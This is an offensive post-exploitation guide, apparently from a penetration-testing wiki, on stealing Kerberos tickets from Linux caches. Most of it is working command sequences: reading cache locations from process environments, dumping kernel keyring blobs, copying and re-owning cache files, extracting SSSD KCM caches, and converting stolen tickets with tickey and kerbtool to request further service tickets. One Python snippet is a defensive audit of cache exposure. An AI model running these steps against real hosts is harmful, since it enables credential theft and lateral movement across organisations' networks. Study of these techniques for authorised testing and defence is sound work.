Harvesting Tickets from Linux


Credential Storage in Linux

Linux systems store Kerberos credentials in three kinds of cache: files (in the /tmp directory), kernel keyrings (a dedicated facility inside the Linux kernel), and process memory (private to a single process). The default_ccache_name setting in /etc/krb5.conf selects the storage type in use; it defaults to FILE:/tmp/krb5cc_%{uid} when not specified.

MIT/Heimdal also support additional backends that you should look for during post-exploitation:

  • DIR:/run/user/%{uid}/krb5cc for directory-backed multi-ticket caches (the systemd-logind default on modern distros).
  • KEYRING:persistent:%{uid} or KEYRING:session to keep ccaches inside the kernel keyring (KEY_SPEC_SESSION_KEYRING, KEY_SPEC_USER_KEYRING, etc.).
  • KCM:%{uid} when SSSD's Kerberos Cache Manager daemon (kcm) provides the ticket storage service.
  • MEMORY:unique_id for process-local caches created by libraries (gssproxy, sshd, etc.).

Whenever you land a shell, pull KRB5CCNAME from /proc/<pid>/environ of interesting daemons (e.g. Apache, sshd, gssproxy) so you know which cache backend is in use before you start copying files.

Enumerating Active Caches

Enumerate the caches before extraction so you do not miss high-value tickets:

$ klist -l            # table of the caches in the current collection (DIR/KEYRING/KCM)
$ klist -A            # print the contents of every cache in the collection
$ sudo keyctl get_persistent @u                   # serial of this UID's persistent keyring
$ sudo keyctl show `keyctl get_persistent @u`     # keys (ccache blobs) it contains
$ sudo ls -al /tmp/krb5cc_* /run/user/*/krb5cc*   # FILE and DIR caches on disk
$ sudo find /proc -maxdepth 2 -name environ -exec sh -c 'tr "\0" "\n" < "$1" | grep -H --label="$1" KRB5' _ {} \;   # KRB5CCNAME per process, prefixed with the environ path it came from

The combination of klist, keyctl, and /proc inspection quickly reveals whether credentials live in files, keyrings, or KCM so you can pick the right dumping technique.
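As an added audit example (not code from the original page or from any tool it names), the following Python does the defender's side of the same inventory: it resolves which cache backend each process ends up using from its KRB5CCNAME or the krb5.conf default, and flags FILE caches whose mode lets group or other read them. The krb5.conf text, environ blobs and file modes are constructed samples; on a live host you would feed it /etc/krb5.conf, /proc/<pid>/environ and os.stat() results.

```python
import stat

KNOWN_BACKENDS = ("FILE", "DIR", "KEYRING", "KCM", "MEMORY")  # backends listed on this page
DEFAULT_CCACHE = "FILE:/tmp/krb5cc_%{uid}"  # libkrb5 built-in default

def parse_ccache_spec(spec):
    # "KEYRING:persistent:1000" -> ("KEYRING", "persistent:1000"); a bare
    # path with no type prefix is a FILE cache, as libkrb5 treats it.
    backend, sep, rest = spec.partition(":")
    if not sep:
        return ("FILE", spec)
    backend = backend.upper()
    return (backend, rest) if backend in KNOWN_BACKENDS else ("UNKNOWN", spec)

def default_ccache_name(krb5_conf):
    # Read default_ccache_name from [libdefaults]; '#' starts a comment.
    section = None
    for line in krb5_conf.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "libdefaults" and line.startswith("default_ccache_name"):
            return line.split("=", 1)[1].strip()
    return DEFAULT_CCACHE

def ccache_from_environ(environ):
    # KRB5CCNAME from a NUL-separated /proc/<pid>/environ blob (bytes).
    for entry in environ.split(b"\0"):
        if entry.startswith(b"KRB5CCNAME="):
            return entry.split(b"=", 1)[1].decode(errors="replace")
    return None

def inventory(krb5_conf, processes, file_modes):
    # processes: {pid: environ bytes}; file_modes: {ccache path: st_mode}. Returns
    # each process's backend plus FILE caches readable by group/other (tighten or alert).
    fallback = default_ccache_name(krb5_conf)
    per_proc = {pid: parse_ccache_spec(ccache_from_environ(env) or fallback)
                for pid, env in processes.items()}
    exposed = sorted(p for p, m in file_modes.items()
                     if m & (stat.S_IRWXG | stat.S_IRWXO))
    return per_proc, exposed

# Constructed sample input, not captured from a real host.
SAMPLE_KRB5_CONF = "[libdefaults]\n default_ccache_name = KEYRING:persistent:%{uid}  # keyring\n"
SAMPLE_PROCS = {
    1234: b"PATH=/usr/bin\0KRB5CCNAME=KCM:1000\0HOME=/home/svc",
    2345: b"PATH=/usr/bin\0HOME=/root",        # inherits the config default
    3456: b"KRB5CCNAME=/tmp/krb5cc_1000\0",     # bare path => FILE cache
}
SAMPLE_MODES = {"/tmp/krb5cc_1000": 0o100644, "/tmp/krb5cc_1001": 0o100600}
```

Calling inventory(SAMPLE_KRB5_CONF, SAMPLE_PROCS, SAMPLE_MODES) reports one KCM, one KEYRING and one FILE consumer, and lists /tmp/krb5cc_1000 as exposed.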

Extracting Credentials

The 2017 paper, Kerberos Credential Thievery (GNU/Linux), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel’s keyring mechanism for managing and storing keys.

Keyring Extraction Overview

The keyctl system call, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The hercules.sh script from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft. Remember that keyring-stored ccaches may live under KEYRING:persistent:%{uid} (permanent across logins), KEYRING:session (cleared on logout), or even KEY_SPEC_THREAD_KEYRING for services spawning helper threads—so always enumerate all keyring types for the compromised UID.

Manual KEYRING Workflow

You can manually harvest tickets without helper scripts whenever default_ccache_name is set to KEYRING:

$ KRING=$(keyctl get_persistent @u)
$ keyctl show $KRING                       # note the key serial of each ccache blob
$ keyctl pipe <serial> > /tmp/ccache_dump  # write raw blob to disk
$ KRB5CCNAME=/tmp/ccache_dump klist        # validate the stolen cache

If multiple principals are stored, repeat the keyctl pipe step for each serial, then convert the extracted ccache into a Windows-friendly .kirbi/.ccache with a tool such as kerbtool (see below) or ticketConverter.py before reusing it from another machine.

Quick Wins for Stealing FILE/DIR Caches

When credentials are stored as FILE: or DIR: caches, plain file operations are usually enough:

$ sudo cp /tmp/krb5cc_1000 /tmp/websvc.ccache
$ sudo cp -r /run/user/1000/krb5cc /tmp/user1000_dircc
$ chmod 600 /tmp/*.ccache && chown attacker /tmp/*.ccache

Directory caches contain one file per service ticket, so compress and exfiltrate the whole directory to keep TGT + TGS pairs intact. You can also point your tooling at the directory directly: KRB5CCNAME=DIR:/tmp/user1000_dircc impacket-psexec ....

Dumping KCM-Managed Caches

SSSD's Kerberos Cache Manager (kcm) proxies credential storage through /var/run/kcm/kcmsock (or /run/.heim_org.h5l.kcm-socket) and persists encrypted blobs inside /var/lib/sss/secrets/ together with .secrets.mkey. Attack flow:

  1. Detect KCM usage via /etc/krb5.conf (default_ccache_name = KCM:) or the output of klist -l.
  2. If you are UID 0 or part of the SELinux kcm domain, list the caches through the management tool:
$ sudo kcm_ctl list                 # lists UID + cache IDs handled by kcm
$ sudo kcm_ctl get 1000 0 > /tmp/1000.kcm.ccache
$ KRB5CCNAME=/tmp/1000.kcm.ccache klist
  3. Offline approach: copy /var/lib/sss/secrets/secrets.ldb together with /var/lib/sss/secrets/.secrets.mkey, then run SSSDKCMExtractor (or similar PoCs) to decrypt and recover the ccaches without touching the live socket. This is especially useful for forensic investigations or when socket ACLs block you but disk access is available.

Because the kcm daemon honours the UID-based ACLs enforced by SSSD, privilege escalation to root (or compromising sssd_kcm) is usually required, but once you have it you can dump every user's TGT within seconds.

Ticket Extraction Tools

Automating the steps above reduces mistakes and gives you cross-platform ticket material that you can replay with Windows tooling.

Tickey

Building on the principles of the hercules.sh script, the tickey tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i. It enumerates kernel keyrings, reconstructs the serialized ccaches, and writes MIT-compatible cache files you can immediately feed to klist, impacket-*, or kerberoast tooling.

Kerbtool

kerbtool is a modern Go utility that runs natively on Linux and can parse, convert, and request Kerberos tickets. Two handy use cases when harvesting from Linux boxes:

# Convert a stolen MIT ccache into a .kirbi usable by Windows tooling
$ ./kerbtool --convert --in /tmp/websvc.ccache --out websvc.kirbi

# Use an extracted cache to request additional TGS tickets without touching the victim again
$ KRB5CCNAME=/tmp/websvc.ccache ./kerbtool --ask --spn cifs/fileserver.lab.local

Having tickey and kerbtool on the implant host lets you move seamlessly between Linux, Windows, and cross-platform Kerberos attack chains.
